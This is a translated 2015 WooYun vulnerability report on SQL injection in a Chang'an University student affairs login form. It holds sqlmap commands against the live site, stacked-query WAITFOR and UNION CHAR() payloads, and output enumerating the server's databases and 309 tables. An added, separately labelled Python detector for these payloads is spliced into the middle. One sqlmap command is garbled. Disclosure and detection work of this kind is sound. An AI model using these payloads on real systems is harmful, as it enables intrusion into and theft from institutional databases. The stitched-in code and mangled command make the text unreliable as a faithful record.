
Vulnerability summary

Defect ID: wooyun-2015-0140992

Title: SQL injection in the Chang'an University student affairs management system (large amount of database data)

Vendor: Chang'an University

Author: 0error-0warning

Submitted: 2015-09-14 12:41

Fixed: 2015-10-29 12:56

Disclosed: 2015-10-29 12:56

Vulnerability type: network design flaw / logic error

Severity: Medium

Self-rated Rank: 7

Status: handed over to a third-party partner (CCERT education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-09-14: Details reported to the vendor; awaiting vendor handling
2015-09-14: Vendor confirmed; details visible to the vendor only
2015-09-24: Details disclosed to core white hats and relevant domain experts
2015-10-04: Details disclosed to regular white hats
2015-10-14: Details disclosed to intern white hats
2015-10-29: Details disclosed to the public

Brief description:

A POST SQL injection vulnerability exists; the injection succeeded and could be exploited.

Detailed description:

http://**.**.**.**/Login/loginpageforstudentb.aspx


[Image: 12.jpg]


Captured the parameters of the POST request with Firefox:

[Image: 111.jpg]


C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/Login/loginpageforuserb.as
px?LogoutURL=%2flogin" --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwE
PDwUKLTMzNDE0ODA3Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril
4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi
%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY
3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS
4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85
byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C
3IyTBvPEM&__EVENTVALIDATION=%2FwEWBALRycKqBAKz8dy8BQKd%2B7qdDgKM54rGBtwGIduop2gl
a2ks2iURfMhj%2BEh1&txtUserId=admin&txtPwd=admin&Button1=%E7%99%BB+%E5%BD%95"
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtUserId (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTMzNDE0ODA3Mg9
kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpP
lhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh WNleW8leW
PtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU
9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnID
lpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh W
NleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C3IyTBvPEM&__EVENTVALIDATION=/wEWBALRycKq
BAKz8dy8BQKd 7qdDgKM54rGBtwGIduop2gla2ks2iURfMhj Eh1&txtUserId=admin';WAITFOR DE
LAY '0:0:5'--&txtPwd=admin&Button1=%E7%99%BB %E5%BD%95
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTMzNDE0ODA3Mg9
kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpP
lhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh WNleW8leW
PtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU
9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnID
lpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh W
NleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C3IyTBvPEM&__EVENTVALIDATION=/wEWBALRycKq
BAKz8dy8BQKd 7qdDgKM54rGBtwGIduop2gla2ks2iURfMhj Eh1&txtUserId=admin' UNION ALL
SELECT NULL,NULL,NULL,NULL,CHAR(113) CHAR(122) CHAR(112) CHAR(113) CHAR(113) CHA
R(65) CHAR(100) CHAR(120) CHAR(106) CHAR(113) CHAR(71) CHAR(108) CHAR(120) CHAR(
109) CHAR(105) CHAR(113) CHAR(113) CHAR(107) CHAR(118) CHAR(113),NULL-- &txtPwd=
admin&Button1=%E7%99%BB %E5%BD%95
---
[23:14:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
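The sqlmap output above reports two injection techniques against the txtUserId field: a stacked query that appends a Microsoft SQL Server WAITFOR DELAY, and a UNION query that pads six columns with NULL and builds a marker string from CHAR() calls (the `+` between the CHAR() calls shows as a space in the output above, just as the `+` inside the base64 __VIEWSTATE does). As an added defender-side example, not part of the original report, the following Python checks the user-typed fields of an ASP.NET login POST body for exactly those two shapes. The request bodies it scans are constructed here with placeholder __VIEWSTATE/__EVENTVALIDATION values, not copied from the page.

```python
import re
from urllib.parse import parse_qs

# ASP.NET postback fields are opaque blobs that the framework itself validates;
# they are not typed by the user, so they are skipped rather than pattern-matched.
FRAMEWORK_FIELDS = {"__VIEWSTATE", "__EVENTVALIDATION", "__EVENTTARGET", "__EVENTARGUMENT"}

# Signatures for the two techniques sqlmap reported against txtUserId:
#  - stacked query: close the string, end the statement, issue a MSSQL time delay
#  - UNION probe: match the column count with NULLs and concatenate CHAR() values
#    (the separator may arrive as '+' or, after naive decoding, as a space)
SIGNATURES = {
    "mssql_stacked_waitfor": re.compile(r"'\s*;\s*WAITFOR\s+DELAY\s+'[\d:]+'", re.I),
    "union_null_probe": re.compile(r"'\s*UNION\s+(ALL\s+)?SELECT\s+NULL(\s*,\s*NULL)*", re.I),
    "char_concat_marker": re.compile(r"CHAR\(\d+\)(\s*[+ ]\s*CHAR\(\d+\)){3,}", re.I),
}


def scan_login_post(body):
    """Return a list of (field, signature) findings for one urlencoded POST body."""
    fields = parse_qs(body, keep_blank_values=True)  # decodes %xx and '+' -> ' '
    findings = []
    for name, values in fields.items():
        if name in FRAMEWORK_FIELDS:
            continue
        for value in values:
            for sig_name, pattern in SIGNATURES.items():
                if pattern.search(value):
                    findings.append((name, sig_name))
    return findings


# Constructed sample bodies (placeholder ViewState; hypothetical field values).
VIEWSTATE_STUB = "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=PLACEHOLDER&__EVENTVALIDATION=PLACEHOLDER&"
BENIGN_BODY = VIEWSTATE_STUB + "txtUserId=admin&txtPwd=admin&Button1=%E7%99%BB+%E5%BD%95"
STACKED_BODY = VIEWSTATE_STUB + "txtUserId=admin%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&txtPwd=admin"
UNION_BODY = VIEWSTATE_STUB + (
    "txtUserId=admin%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2C"
    "CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%28113%29%2CNULL--+&txtPwd=admin"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("stacked", STACKED_BODY), ("union", UNION_BODY)):
        print(label, scan_login_post(body))
```

The same check can run on a WAF or reverse-proxy request log, since it only needs the raw form body; the framework fields are skipped on purpose so that base64 ViewState never triggers a false positive.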


POST injection confirmed.

C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/Login/loginpageforuserb.as
px?LogoutURL=%2flogin" --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwE
PDwUKLTMzNDE0ODA3Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril
4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi
%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY
3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS
4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85
byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C
3IyTBvPEM&__EVENTVALIDATION=%2FwEWBALRycKqBAKz8dy8BQKd%2B7qdDgKM54rGBtwGIduop2gl
a2ks2iURfMhj%2BEh1&txtUserId=admin&txtPwd=admin&Button1=%E7%99%BB+%E5%BD%95" --d
bs
[23:16:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[23:16:55] [INFO] fetching database names
[23:16:55] [INFO] the SQL query used returns 8 entries
[23:16:55] [INFO] resumed: master
[23:16:55] [INFO] resumed: model
[23:16:55] [INFO] resumed: msdb
[23:16:55] [INFO] resumed: Northwind
[23:16:55] [INFO] resumed: pubs
[23:16:55] [INFO] resumed: StudWork
[23:16:55] [INFO] resumed: tempdb
[23:16:55] [INFO] resumed: 长安大学_学工在线
available databases [8]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] StudWork
[*] tempdb
[*] 长安大学_学工在线


The databases were enumerated.
I picked one at random and had a look.

C:\Python27\sqlmap>sqlmap.py -px?LogoutURL=%2flogin" --dataPDwUKLTMzNDE0ODA3Mg9kFgICAw9kF4%2FlhYHorrjmnIDlpJrovpPlhaXlr%2Bk2BWFpeiLseaWh%2BWNleW8leW3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU4jeiDveS4uuepugril4%2FlhYHorrjbyPOuS4jeWFgeiuuOi%2Bk%2BWFpei3IyTBvPEM&__EVENTVALIDATION=%2a2ks2iURfMhj%2BEh1&txtUserId=a长安大学_学工在线 --tables
Database: 长安大学_学工在线
[309 tables]


Over three hundred tables in all, far too much content; I had no interest in researching or trying any further, so I stopped there.

Proof of vulnerability:

SQL injection also takes patience and perseverance.

Fix recommendation:

Copyright notice: when reposting, credit the source as 0error-0warning@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2015-09-14 12:55

Vendor reply:

Notified; being processed

Latest status:

None yet